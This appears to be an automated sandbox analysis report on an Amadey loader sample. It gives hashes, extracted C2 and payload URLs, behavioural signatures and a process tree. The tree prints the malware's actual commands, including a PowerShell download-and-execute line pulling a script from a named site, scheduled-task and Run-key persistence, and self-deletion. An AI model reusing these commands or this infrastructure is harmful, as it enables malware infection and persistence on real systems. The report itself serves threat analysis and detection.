Analysis
-
max time kernel
137s -
max time network
139s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
24-11-2022 16:47
Static task
static1
Behavioral task
behavioral1
Sample
a3ab76b17b04ccbaff41b72ed665bf28e6c5586a4f715e43b1100820acdfd819.exe
Resource
win7-20220901-en
Behavioral task
behavioral2
Sample
a3ab76b17b04ccbaff41b72ed665bf28e6c5586a4f715e43b1100820acdfd819.exe
Resource
win10v2004-20220812-en
General
-
Target
a3ab76b17b04ccbaff41b72ed665bf28e6c5586a4f715e43b1100820acdfd819.exe
-
Size
244KB
-
MD5
c8f046db4ece8e5bc2654c7037267b96
-
SHA1
f21cca0c799bfcb3d9ee3e0b511188a10b0b1327
-
SHA256
a3ab76b17b04ccbaff41b72ed665bf28e6c5586a4f715e43b1100820acdfd819
-
SHA512
bcec736ef727605fbe5a3b26fdaf4d13902e3f59d6c7d54262cf11bc3e1bb6d16b280e96600cca83f1564310bc8ea25aee982f770db6a7c3aaea787648037231
-
SSDEEP
6144:OWzEq1LqpOlwKhQB98/HLnOMOvWtIC8EeSL3WnV:OWzE+upOxhQBq/HLOMfZWV
Malware Config
Extracted
https://www.tvculturaourofino.com.br/assets/js/config_20.ps1
Extracted
amadey
3.50
193.56.146.174/g84kvj4jck/index.php
Signatures
-
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 48 3028 powershell.exe 49 3028 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 4 IoCs
Processes:
rovwer.exe3000.exefile.exerovwer.exepid process 4544 rovwer.exe 1512 3000.exe 1112 file.exe 4848 rovwer.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
a3ab76b17b04ccbaff41b72ed665bf28e6c5586a4f715e43b1100820acdfd819.exerovwer.exefile.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation a3ab76b17b04ccbaff41b72ed665bf28e6c5586a4f715e43b1100820acdfd819.exe Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation rovwer.exe Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation file.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
rovwer.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\3000.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000212001\\3000.exe" rovwer.exe Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\file.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000213001\\file.exe" rovwer.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 2 IoCs
Processes:
WerFault.exeWerFault.exepid pid_target process target process 1340 4352 WerFault.exe a3ab76b17b04ccbaff41b72ed665bf28e6c5586a4f715e43b1100820acdfd819.exe 344 4848 WerFault.exe rovwer.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 3028 powershell.exe 3028 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 3028 powershell.exe -
Suspicious use of WriteProcessMemory 43 IoCs
Processes:
a3ab76b17b04ccbaff41b72ed665bf28e6c5586a4f715e43b1100820acdfd819.exerovwer.execmd.exefile.execmd.execmd.exedescription pid process target process PID 4352 wrote to memory of 4544 4352 a3ab76b17b04ccbaff41b72ed665bf28e6c5586a4f715e43b1100820acdfd819.exe rovwer.exe PID 4352 wrote to memory of 4544 4352 a3ab76b17b04ccbaff41b72ed665bf28e6c5586a4f715e43b1100820acdfd819.exe rovwer.exe PID 4352 wrote to memory of 4544 4352 a3ab76b17b04ccbaff41b72ed665bf28e6c5586a4f715e43b1100820acdfd819.exe rovwer.exe PID 4544 wrote to memory of 4896 4544 rovwer.exe schtasks.exe PID 4544 wrote to memory of 4896 4544 rovwer.exe schtasks.exe PID 4544 wrote to memory of 4896 4544 rovwer.exe schtasks.exe PID 4544 wrote to memory of 4560 4544 rovwer.exe cmd.exe PID 4544 wrote to memory of 4560 4544 rovwer.exe cmd.exe PID 4544 wrote to memory of 4560 4544 rovwer.exe cmd.exe PID 4560 wrote to memory of 2512 4560 cmd.exe cmd.exe PID 4560 wrote to memory of 2512 4560 cmd.exe cmd.exe PID 4560 wrote to memory of 2512 4560 cmd.exe cmd.exe PID 4560 wrote to memory of 3500 4560 cmd.exe cacls.exe PID 4560 wrote to memory of 3500 4560 cmd.exe cacls.exe PID 4560 wrote to memory of 3500 4560 cmd.exe cacls.exe PID 4560 wrote to memory of 2392 4560 cmd.exe cacls.exe PID 4560 wrote to memory of 2392 4560 cmd.exe cacls.exe PID 4560 wrote to memory of 2392 4560 cmd.exe cacls.exe PID 4560 wrote to memory of 688 4560 cmd.exe cmd.exe PID 4560 wrote to memory of 688 4560 cmd.exe cmd.exe PID 4560 wrote to memory of 688 4560 cmd.exe cmd.exe PID 4560 wrote to memory of 3564 4560 cmd.exe cacls.exe PID 4560 wrote to memory of 3564 4560 cmd.exe cacls.exe PID 4560 wrote to memory of 3564 4560 cmd.exe cacls.exe PID 4560 wrote to memory of 4932 4560 cmd.exe cacls.exe PID 4560 wrote to memory of 4932 4560 cmd.exe cacls.exe PID 4560 wrote to memory of 4932 4560 cmd.exe cacls.exe PID 4544 wrote to memory of 1512 4544 rovwer.exe 3000.exe PID 4544 wrote to memory of 1512 4544 rovwer.exe 3000.exe PID 4544 wrote to memory of 1512 4544 rovwer.exe 3000.exe PID 4544 wrote to memory of 1112 4544 rovwer.exe file.exe PID 4544 wrote to memory of 1112 4544 rovwer.exe file.exe PID 4544 wrote to memory of 1112 4544 rovwer.exe file.exe PID 1112 wrote to memory of 4240 1112 file.exe cmd.exe PID 1112 wrote to memory of 4240 1112 file.exe cmd.exe PID 4240 wrote to memory of 3028 4240 cmd.exe powershell.exe PID 4240 wrote to memory of 3028 4240 cmd.exe powershell.exe PID 1112 wrote to memory of 1896 1112 file.exe cmd.exe PID 1112 wrote to memory of 1896 1112 file.exe cmd.exe PID 1112 wrote to memory of 1896 1112 file.exe cmd.exe PID 1896 wrote to memory of 4516 1896 cmd.exe PING.EXE PID 1896 wrote to memory of 4516 1896 cmd.exe PING.EXE PID 1896 wrote to memory of 4516 1896 cmd.exe PING.EXE
Processes
-
C:\Users\Admin\AppData\Local\Temp\a3ab76b17b04ccbaff41b72ed665bf28e6c5586a4f715e43b1100820acdfd819.exe"C:\Users\Admin\AppData\Local\Temp\a3ab76b17b04ccbaff41b72ed665bf28e6c5586a4f715e43b1100820acdfd819.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4352 -
C:\Users\Admin\AppData\Local\Temp\99e342142d\rovwer.exe"C:\Users\Admin\AppData\Local\Temp\99e342142d\rovwer.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4544 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rovwer.exe /TR "C:\Users\Admin\AppData\Local\Temp\99e342142d\rovwer.exe" /F3⤵
- Creates scheduled task(s)
PID:4896 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "rovwer.exe" /P "Admin:N"&&CACLS "rovwer.exe" /P "Admin:R" /E&&echo Y|CACLS "..\99e342142d" /P "Admin:N"&&CACLS "..\99e342142d" /P "Admin:R" /E&&Exit3⤵
- Suspicious use of WriteProcessMemory
PID:4560 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"4⤵PID:2512
-
C:\Windows\SysWOW64\cacls.exeCACLS "rovwer.exe" /P "Admin:N"4⤵PID:3500
-
C:\Windows\SysWOW64\cacls.exeCACLS "rovwer.exe" /P "Admin:R" /E4⤵PID:2392
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"4⤵PID:688
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\99e342142d" /P "Admin:N"4⤵PID:3564
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\99e342142d" /P "Admin:R" /E4⤵PID:4932
-
C:\Users\Admin\AppData\Local\Temp\1000212001\3000.exe"C:\Users\Admin\AppData\Local\Temp\1000212001\3000.exe"3⤵
- Executes dropped EXE
PID:1512 -
C:\Users\Admin\AppData\Local\Temp\1000213001\file.exe"C:\Users\Admin\AppData\Local\Temp\1000213001\file.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1112 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://www.tvculturaourofino.com.br/assets/js/config_20.ps1')"4⤵
- Suspicious use of WriteProcessMemory
PID:4240 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command IEX(New-Object Net.Webclient).DownloadString('https://www.tvculturaourofino.com.br/assets/js/config_20.ps1')5⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3028 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\1000213001\file.exe" >> NUL4⤵
- Suspicious use of WriteProcessMemory
PID:1896 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.15⤵
- Runs ping.exe
PID:4516 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4352 -s 9042⤵
- Program crash
PID:1340
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 4352 -ip 43521⤵PID:3088
-
C:\Users\Admin\AppData\Local\Temp\99e342142d\rovwer.exeC:\Users\Admin\AppData\Local\Temp\99e342142d\rovwer.exe1⤵
- Executes dropped EXE
PID:4848 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4848 -s 4242⤵
- Program crash
PID:344
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4848 -ip 48481⤵PID:732
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\5080DC7A65DB6A5960ECD874088F3328_862BA1770B2FEE013603D2FF9ABEAFDA
Filesize2KB
MD5a00df46a47444b9f0c07a8aa108451e5
SHA178431ace34654656da1081628f260813e05fa3c5
SHA256985872da234d081b3787a0f7bdf155dd5235ca2b1ed066ada683e528982b7291
SHA512bdaa0115f93427bb4d053eeea2a22d5cf80d7b24d4a33070ff251510c8325d2620486210a1aecf76d9805f97902ed333f73360aa23bb197acfca2b1d74c2135f
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_2DBE917624E9880FE0C7C5570D56E691
Filesize1KB
MD56ecce5cfdd4846330c341ae8675deda5
SHA1f16a1e887e90a86f18a23926e28d0ff40fe00b70
SHA2561185d9916e084a632219cf5f5cd2b93d5c443cc8eed7b0316fe0136c77d2e43b
SHA512c42a045385c7302198d140638e9a19483a5ae146c197ba0274e37b46735619d5412f0a8745acc565857458d67c5a99a78fdf9790951eb78fb3cbcc2cd059006e
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\5080DC7A65DB6A5960ECD874088F3328_862BA1770B2FEE013603D2FF9ABEAFDA
Filesize482B
MD5bc37dae52ed9d24bc8503be24cf1da4e
SHA12c1b55b29b6f5aa607b37ce1e7659598d70e55cb
SHA25690763464e3ba185a825e3f8173da4a8cf64c1649c6e105d7b47af47ba0a47b44
SHA5122ee0bbe3e52fbfe5c9356f21cbe79f7fda4e9067eb24f4e4eeda53db9fc8bfe0b1d8f04e05f3a44984c879a39add3eb51a254367764ccdbf1529063c02b1fa1f
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_2DBE917624E9880FE0C7C5570D56E691
Filesize486B
MD529f337d2cc1b16de7a516f795e701545
SHA1b7541fe7053149d152e5dfe511eadc0f5555f3de
SHA25637832569347e3e8bcf9e9177c40e6383848754bcd189bef8b7518b9168bcdf68
SHA512600df1f85565607c45c32a7189bbc6ae09c60d4e33852528968ce87c01955faa8906b7272c0c470660f27d58b11a7746b5ce48531b6e3aecec453fd64af42b1e
-
Filesize
2.4MB
MD577181eb9385b899f4bce3387a2efe18c
SHA168488c2d2aae96c6f552bcddb81e198b0390312a
SHA256e18597f8343d2752ecfea69c4615ea58f37d948ee5d0741791410fb2a4827b1b
SHA5123d034f0b238ad5da850d38f3f247693415ca1773aab84f25c32d500864d7a11b8385d2c5da45a19950c5cdad9664963af85ae13d48da7fceee895d847f94eeb9
-
Filesize
121KB
MD595dbf9c73797b1b7c2630c3787f1176f
SHA13ff7a9c84709359a51f0ab399ca9c80ef39b158e
SHA25617327944471d08fa9ff485acec01223dd98713f32670dbd99a24e04e1be57c36
SHA51224c787a8b537590b2160b740fed9695c0e02f2aacf27d93e47f77da54d2a69859778eb37ab8c5782d3a9078d4e8e1ad28bfddf1603f3b73cefc95bc39d82374b
-
Filesize
121KB
MD595dbf9c73797b1b7c2630c3787f1176f
SHA13ff7a9c84709359a51f0ab399ca9c80ef39b158e
SHA25617327944471d08fa9ff485acec01223dd98713f32670dbd99a24e04e1be57c36
SHA51224c787a8b537590b2160b740fed9695c0e02f2aacf27d93e47f77da54d2a69859778eb37ab8c5782d3a9078d4e8e1ad28bfddf1603f3b73cefc95bc39d82374b
-
Filesize
244KB
MD5c8f046db4ece8e5bc2654c7037267b96
SHA1f21cca0c799bfcb3d9ee3e0b511188a10b0b1327
SHA256a3ab76b17b04ccbaff41b72ed665bf28e6c5586a4f715e43b1100820acdfd819
SHA512bcec736ef727605fbe5a3b26fdaf4d13902e3f59d6c7d54262cf11bc3e1bb6d16b280e96600cca83f1564310bc8ea25aee982f770db6a7c3aaea787648037231
-
Filesize
244KB
MD5c8f046db4ece8e5bc2654c7037267b96
SHA1f21cca0c799bfcb3d9ee3e0b511188a10b0b1327
SHA256a3ab76b17b04ccbaff41b72ed665bf28e6c5586a4f715e43b1100820acdfd819
SHA512bcec736ef727605fbe5a3b26fdaf4d13902e3f59d6c7d54262cf11bc3e1bb6d16b280e96600cca83f1564310bc8ea25aee982f770db6a7c3aaea787648037231
-
Filesize
244KB
MD5c8f046db4ece8e5bc2654c7037267b96
SHA1f21cca0c799bfcb3d9ee3e0b511188a10b0b1327
SHA256a3ab76b17b04ccbaff41b72ed665bf28e6c5586a4f715e43b1100820acdfd819
SHA512bcec736ef727605fbe5a3b26fdaf4d13902e3f59d6c7d54262cf11bc3e1bb6d16b280e96600cca83f1564310bc8ea25aee982f770db6a7c3aaea787648037231